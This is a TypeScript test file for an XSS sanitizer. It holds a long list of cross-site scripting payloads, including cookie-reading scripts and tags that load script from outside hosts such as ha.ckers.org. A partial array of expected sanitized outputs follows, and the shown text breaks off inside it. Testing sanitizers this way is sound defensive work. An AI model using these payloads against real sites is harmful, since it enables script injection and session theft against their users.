ts/utils/__tests__/xss.test.ts
import { filterXSS } from "xss";
const maliciousPayloads: ReadonlyArray<string> = [
`<script>alert(123);</script>`,
`<ScRipT>alert("XSS");</ScRipT>`,
`<script>alert(123)</script>`,
`<script>alert("hellox worldss");</script>`,
`<script>alert(“XSS”)</script> `,
`<script>alert(“XSS”);</script>`,
`<script>alert(‘XSS’)</script>`,
`“><script>alert(“XSS”)</script>`,
`<script>alert(/XSS”)</script>`,
`<script>alert(/XSS/)</script>`,
`</script><script>alert(1)</script>`,
`‘; alert(1);`,
`‘)alert(1);//`,
`<ScRiPt>alert(1)</sCriPt>`,
`<IMG SRC=jAVasCrIPt:alert(‘XSS’)>`,
`<IMG SRC=”javascript:alert(‘XSS’);”>`,
`<IMG SRC=javascript:alert("XSS")>`,
`<IMG SRC=javascript:alert(‘XSS’)> `,
`<img src=xss onerror=alert(1)>`,
`<iframe %00 src="	javascript:prompt(1)	"%00><svg><style>{font-family:\'<iframe/onload=confirm(1)>\'<input/onmouseover="javaSCRIPT:confirm(1)"<sVg><scRipt %00>alert(1) {Opera}<img/src=\`%00\` onerror=this.onerror=confirm(1)<form><isindex formaction="javascript:confirm(1)"<img src=\`%00\`
 onerror=alert(1)
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script><ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=?<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="><script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/"><h1/onmouseover='\u0061lert(1)'>%00<iframe/src="data:text/html,<svg onload=alert(1)>"><meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/><svg><script xlink:href=data:,window.open('https://www.google.com/')></script<svg><script x:href=\'https://dl.dropbox.com/u/13018058/js.js\' {Opera}<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">`,
`<iframe src=javascript:alert(document.location)><form><a href="javascript:\u0061lert(1)">X</script><img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>`,
`<img/	  src=\`~\` onerror=prompt(1)>`,
`<form><iframe 	  src="javascript:alert(1)" 	;><a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</ahttp://www.google<script .com>alert(document.location)</script<a href=[�]"� onmouseover=prompt(1)//">XYZ</a<img/src=@  onerror = prompt('1')<style/onload=prompt('XSS')<script ^__^>alert(String.fromCharCode(49))</script ^__^</style  ><script   :-(>/**/alert(document.location)/**/</script   :-(�</form><input type="date" onfocus="alert(1)"><form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'><script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/<iframe srcdoc='<body onload=prompt(1)>'><a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a><script ~~~>alert(0%0)</script ~~~><style/onload=<!--	> alert (1)><///style///><span %2F onmousemove='alert(1)'>SPAN<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}<marquee onstart='javascript:alert(1)'>^__^<div/style="width:expression(confirm(1))">X</div> {IE7}<iframe/%00/ src=javaSCRIPT:alert(1)//<form/action=javascript:alert(document.cookie)><input/type='submit'>///*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style><a/href="javascript: javascript:prompt(1)"><input type="X"></plaintext\></|\><plaintext/onmouseover=prompt(1)</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera}<a href="javascript:\u0061le%72t(1)"><button><div onmouseover='alert(1)'>DIV</div><iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"><a href="jAvAsCrIpT:alert(1)">X</a><embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"><object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"><var onmouseover="prompt(1)">On Mouse Over</var><a href=javascript:alert(document.cookie)>Click Here</a><img src="/" =_=" title="onerror='prompt(1)'"><%<!--'%><script>alert(1);</script --><script src="data:text/javascript,alert(1)"></script>`,
`<iframe/src \/\/onload = prompt(1)<iframe/onreadystatechange=alert(1)<svg/onload=alert(1)<input value=<><iframe/src=javascript:confirm(1)<input type="text" value=\`\` <div/onmouseover='alert(1)'>X</div>http://www.<script>alert(1)</script .com<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe><svg><script ?>alert(1)<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe><img src=\`xx:xx\`onerror=alert(1)><meta http-equiv="refresh" content="0;javascript:alert(1)"/>`,
`<math><a xlink:href="//jsfiddle.net/t846h/">click<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always>`,
`<svg contentScriptType=text/vbs><script>MsgBox+1<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE><script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F`,
`<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script<object data=javascript:\u0061le%72t(1)><script>+-+-1-+-+alert(1)</script><body/onload=<!-->
alert(1)><script itworksinallbrowsers>/*<script* */alert(1)</script<img src ?itworksonchrome?\/onerror = alert(1)<svg><script>//
confirm(1);</script </svg>`,
`<svg><script onlypossibleinopera:-)> alert(1)<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe<script x> alert(1) </script 1=2<div/onmouseover=\'alert(1)\'> style="x:"><--\`<img/src=\` onerror=alert(1)> --!>`,
` <script/src=data:text/javascript,alert(1)></script><div style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button>"><img src=x onerror=window.open('https://www.google.com/');><form><button formaction=javascript:alert(1)>CLICKME<math><a xlink:href="//jsfiddle.net/t846h/">click<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe><a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a><SCRIPT>String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41)</SCRIPT>`,
`‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>`,
`<IMG “””><SCRIPT>alert(“XSS”)</SCRIPT>”>`,
`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`,
`<IMG SRC=”jav ascript:alert(‘XSS’);”>`,
`<IMG SRC=”jav	ascript:alert(‘XSS’);”>`,
`<<SCRIPT>alert(“XSS”);//<</SCRIPT>`,
`%253cscript%253ealert(1)%253c/script%253e`,
`“><s”%2b”cript>alert(document.cookie)</script>`,
`foo<script>alert(1)</script>`,
`<scr<script>ipt>alert(1)</scr</script>ipt>`,
`<IMG SRC=javascript:alert('XSS')>`,
`<IMG SRC=javascript:alert('XSS')>`,
`<IMG SRC=javascript:alert('XSS')>`,
`<BODY BACKGROUND=”javascript:alert(‘XSS’)”>`,
`<BODY ONLOAD=alert(‘XSS’)>`,
`<INPUT TYPE=”IMAGE” SRC=”javascript:alert(‘XSS’);”>`,
`<IMG SRC=”javascript:alert(‘XSS’)”`,
`<iframe src=http://ha.ckers.org/scriptlet.html <`,
`javascript:alert("hellox worldss")`,
`<img src="javascript:alert('XSS');">`,
`<img src=javascript:alert("XSS")>`,
`<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>`,
`<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">`,
`<IFRAME SRC="javascript:alert('XSS');"></IFRAME>`,
`<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>`,
`<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<<SCRIPT>alert("XSS");//<</SCRIPT>`,
`<"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>`,
`';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))<?/SCRIPT>&submit.x=27&submit.y=9&cmd=search`,
`<script>alert("hellox worldss")</script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510`,
`<script>alert("XSS");</script>&search=1`,
`0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2?8String.fromCharCode(88,83,83))//";alert(String.fromCharCode?(88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search`,
`<h1><font color=blue>hellox worldss</h1>`,
`<BODY ONLOAD=alert('hellox worldss')>`,
`<input onfocus=write(XSS) autofocus>`,
`<input onblur=write(XSS) autofocus><input autofocus>`,
`<body onscroll=alert(XSS)><br><br><br><br><br><br>...<br><br><br><br><input autofocus>`,
`<form><button formaction="javascript:alert(XSS)">lol`,
`<!--<img src="--><img src=x onerror=alert(XSS)//">`,
`<![><img src="]><img src=x onerror=alert(XSS)//">`,
`<style><img src="</style><img src=x onerror=alert(XSS)//">`,
`<? foo="><script>alert(1)</script>">`,
`<! foo="><script>alert(1)</script>">`,
`</ foo="><script>alert(1)</script>">`,
`<? foo="><x foo='?><script>alert(1)</script>'>">`,
`<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>">`,
`<% foo><x foo="%><script>alert(123)</script>">`,
`<div style="font-family:'foo ;color:red;';">LOL`,
`LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}</style>`,
`<script>({0:#0=alert/#0#/#0#(0)})</script>`,
`<svg xmlns="http://www.w3.org/2000/svg">LOL<script>alert(123)</script></svg>`,
`<SCRIPT>alert(/XSS/.source)</SCRIPT>`,
`\\";alert('XSS');//`,
`</TITLE><SCRIPT>alert(\"XSS\");</SCRIPT>`,
`<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">`,
`<BODY BACKGROUND=\"javascript:alert('XSS')\">`,
`<BODY ONLOAD=alert('XSS')>`,
`<IMG DYNSRC=\"javascript:alert('XSS')\">`,
`<IMG LOWSRC=\"javascript:alert('XSS')\">`,
`<BGSOUND SRC=\"javascript:alert('XSS');\">`,
`<BR SIZE=\"&{alert('XSS')}\">`,
`<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>`,
`<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">`,
`<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">`,
`<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>`,
`<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">`,
`<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>`,
`<XSS STYLE=\"behavior: url(xss.htc);\">`,
`<STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS`,
`<IMG SRC='vbscript:msgbox(\"XSS\")'>`,
`<IMG SRC=\"mocha:[code]\">`,
`<IMG SRC=\"livescript:[code]\">`,
`žscriptualert(EXSSE)ž/scriptu`,
`<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">`,
`<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">`,
`<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"`,
`<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>`,
`<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>`,
`<TABLE BACKGROUND=\"javascript:alert('XSS')\">`,
`<TABLE><TD BACKGROUND=\"javascript:alert('XSS')\">`,
`<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">`,
`<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">`,
`<DIV STYLE=\"width: expression(alert('XSS'));\">`,
`<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">`,
`<XSS STYLE=\"xss:expression(alert('XSS'))\">`,
`exp/*<A STYLE='no\\xss:noxss(\"*//*\");`,
`xss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'>`,
`<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>`,
`<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>`,
`<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>`,
`<!--[if gte IE 4]>`,
`<SCRIPT>alert('XSS');</SCRIPT>`,
`<![endif]-->`,
`<BASE HREF=\"javascript:alert('XSS');//\">`,
`<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>`,
`<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>`,
`<EMBED SRC=\"http://ha.ckers.org/xss.swf\" AllowScriptAccess=\"always\"></EMBED>`,
`<EMBED SRC=\"data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\" type=\"image/svg+xml\" AllowScriptAccess=\"always\"></EMBED>`,
`a=\"get\";`,
`b=\"URL(\\"\";`,
`c=\"javascript:\";`,
`d=\"alert('XSS');\\")\";`,
`eval(a+b+c+d);`,
`<HTML xmlns:xss><?import namespace=\"xss\" implementation=\"http://ha.ckers.org/xss.htc\"><xss:xss>XSS</xss:xss></HTML>`,
`<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas]]><![CDATA[cript:alert('XSS');\">]]>`,
`</C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>`,
`<XML ID=\"xss\"><I><B><IMG SRC=\"javas<!-- -->cript:alert('XSS')\"></B></I></XML>`,
`<SPAN DATASRC=\"#xss\" DATAFLD=\"B\" DATAFORMATAS=\"HTML\"></SPAN>`,
`<XML SRC=\"xsstest.xml\" ID=I></XML>`,
`<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>`,
`<HTML><BODY>`,
`<?xml:namespace prefix=\"t\" ns=\"urn:schemas-microsoft-com:time\">`,
`<?import namespace=\"t\" implementation=\"#default#time2\">`,
`<t:set attributeName=\"innerHTML\" to=\"XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>\">`,
`</BODY></HTML>`,
`<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>`,
`<!--#exec cmd=\"/bin/echo '<SCR'\"--><!--#exec cmd=\"/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'\"-->`,
`<? echo('<SCR)';`,
`echo('IPT>alert(\"XSS\")</SCRIPT>'); ?>`,
`<IMG SRC=\"http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode\">`,
`Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser`,
`<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">`,
`<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-`,
`<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>`,
`<SCRIPT =\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>`,
`<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>`,
`<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>`,
`<SCRIPT a=\`>\` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>`,
`<SCRIPT a=\">'>\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>`,
`<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>`,
`<A HREF=\"http://66.102.7.147/\">XSS</A>`,
`<A HREF=\"http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\">XSS</A>`,
`<A HREF=\"http://1113982867/\">XSS</A>`,
`<A HREF=\"http://0x42.0x0000066.0x7.0x93/\">XSS</A>`,
`<A HREF=\"http://0102.0146.0007.00000223/\">XSS</A>`,
`<A HREF=\"htt p://6 6.000146.0x7.147/\">XSS</A>`,
`<A HREF=\"//www.google.com/\">XSS</A>`,
`<A HREF=\"//google\">XSS</A>`,
`<A HREF=\"http://ha.ckers.org@google\">XSS</A>`,
`<A HREF=\"http://google:ha.ckers.org\">XSS</A>`,
`<A HREF=\"http://google.com/\">XSS</A>`,
`<A HREF=\"http://www.google.com./\">XSS</A>`,
`<A HREF=\"javascript:document.location='http://www.google.com/'\">XSS</A>`,
`<A HREF=\"http://www.gohttp://www.google.com/ogle.com/\">XSS</A>`,
`<`,
`%3C`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`<`,
`\x3c`,
`\x3C`,
`\u003c`,
`\u003C`,
`<iframe src=http://ha.ckers.org/scriptlet.html>`,
`<IMG SRC=\"javascript:alert('XSS')\"`,
`<SCRIPT SRC=//ha.ckers.org/.js>`,
`<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>`,
`<<SCRIPT>alert(\"XSS\");//<</SCRIPT>`,
`<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>`,
`<BODY onload!#$%&()*~+-_.,:;?@[/|\]^\`=alert(\"XSS\")>`,
`<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>`,
`<IMG SRC=\" javascript:alert('XSS');\">`,
`<IMG SRC=\"jav
ascript:alert('XSS');\">`,
`<IMG SRC=\"jav
ascript:alert('XSS');\">`,
`<IMG SRC=\"jav	ascript:alert('XSS');\">`,
`<IMG SRC=javascript:alert('XSS')>`,
`<IMG SRC=javascript:alert('XSS')>`,
`<IMG SRC=javascript:alert('XSS')>`,
`<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>`,
`<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">`,
`<IMG SRC=\`javascript:alert(\"RSnake says, 'XSS'\")\`>`,
`<IMG SRC=javascript:alert("XSS")>`,
`<IMG SRC=JaVaScRiPt:alert('XSS')>`,
`<IMG SRC=javascript:alert('XSS')>`,
`<IMG SRC=\"javascript:alert('XSS');\">`,
`<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>`,
`'';!--\"<XSS>=&{()}`,
`';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>`,
`';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>`,
`'';!--"<XSS>=&{()}`,
`<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>`,
`<IMG SRC="javascript:alert('XSS');">`,
`<IMG SRC=javascript:alert('XSS')>`,
`<IMG SRC=javascrscriptipt:alert('XSS')>`,
`<IMG SRC=JaVaScRiPt:alert('XSS')>`,
`<IMG """><SCRIPT>alert("XSS")</SCRIPT>">`,
`<IMG SRC="  javascript:alert('XSS');">`,
`<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<<SCRIPT>alert("XSS");//<</SCRIPT>`,
`<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>`,
`\";alert('XSS');//`,
`</TITLE><SCRIPT>alert("XSS");</SCRIPT>`,
`¼script¾alert(¢XSS¢)¼/script¾`,
`<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">`,
`<IFRAME SRC="javascript:alert('XSS');"></IFRAME>`,
`<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>`,
`<TABLE BACKGROUND="javascript:alert('XSS')">`,
`<TABLE><TD BACKGROUND="javascript:alert('XSS')">`,
`<DIV STYLE="background-image: url(javascript:alert('XSS'))">`,
`<DIV STYLE="width: expression(alert('XSS'));">`,
`<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">`,
`<XSS STYLE="xss:expression(alert('XSS'))">`,
`exp/*<A STYLE='no\\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression(alert("XSS"))'>`,
`<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>`,
`a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);`,
`<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>`,
`<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></BODY></HTML>`,
`<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>`,
`<form id="test" /><button form="test" formaction="javascript:alert(123)">TESTHTML5FORMACTION`,
`<form><button formaction="javascript:alert(123)">crosssitespt`,
`<frameset onload=alert(123)>`,
`<!--<img src="--><img src=x onerror=alert(123)//">`,
`<style><img src="</style><img src=x onerror=alert(123)//">`,
`<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">`,
`<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">`,
`<embed src="javascript:alert(1)">`,
`<? foo="><script>alert(1)</script>">`,
`<! foo="><script>alert(1)</script>">`,
`</ foo="><script>alert(1)</script>">`,
`<script>({0:#0=alert/#0#/#0#(123)})</script>`,
`<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script>`,
`<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>`,
`<script src="#">{alert(1)}</script>;1`,
`<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>`,
`<svg xmlns="#"><script>alert(1)</script></svg>`,
`<svg onload="javascript:alert(123)" xmlns="#"></svg>`,
`<iframe xmlns="#" src="javascript:alert(1)"></iframe>`,
`+ADw-script+AD4-alert(document.location)+ADw-/script+AD4-`,
`%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4-`,
`+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi-`,
`%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi-`,
`%253cscript%253ealert(document.cookie)%253c/script%253e`,
`“><s”%2b”cript>alert(document.cookie)</script>`,
`“><ScRiPt>alert(document.cookie)</script>`,
`“><<script>alert(document.cookie);//<</script>`,
`foo<script>alert(document.cookie)</script>`,
`<scr<script>ipt>alert(document.cookie)</scr</script>ipt>`,
`%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E`,
`‘; alert(document.cookie); var foo=’`,
`foo\’; alert(document.cookie);//’;`,
`</script><script >alert(document.cookie)</script>`,
`<img src=asdf onerror=alert(document.cookie)>`,
`<BODY ONLOAD=alert(’XSS’)>`,
`<script>alert(1)</script>`,
`"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>`,
`<video src=1 onerror=alert(1)>`,
`<audio src=1 onerror=alert(1)>`
];
const expectedSanitized: ReadonlyArray<string> = [
``,
``,
``,
``,
` `,
``,
``,
`“>`,
``,
``,
``,
`‘; alert(1);`,
`‘)alert(1);//`,
``,
`<img src>`,
`<img src>`,
`<img src>`,
`<img src> `,
`<img src>`,
`<iframe %00 src="	javascript:prompt(1)	"%00><svg><style>{font-family:'<iframe/onload=confirm(1)>'<input/onmouseover="javaSCRIPT:confirm(1)"<sVg>[removed]prompt(1)</ScRipT giveanswerhere=?<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg==">[removed]/*%00*/alert(1)/*%00*/</script /*%00*/"><h1/onmouseover='alert(1)'>%00<iframe/src="data:text/html,<svg onload=alert(1)>"><meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/><svg>[removed]</script<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera}<meta http-equiv="refresh" content="0;url=javascript:confirm(1)">`,
`<iframe src=javascript:alert(document.location)><form><a href>X<img/*%00/src="worksinchrome:prompt(1)"/%00*/onerror='eval(src)'>`,
`<img/	  src=\`~\` onerror=prompt(1)>`,
`<form><iframe 	  src="javascript:alert(1)" 	;><a href>X</ahttp://www.google<style/onload=<!--	> alert (1)><///style///><span>SPAN<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1)"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' <blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera}<marquee onstart='javascript:alert(1)'>^__^<div/style="width:expression(confirm(1))">X</div> {IE7}<iframe/%00/ src=javaSCRIPT:alert(1)//<form/action=javascript:alert(document.cookie)><input/type='submit'>///*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/>//|\\ `,
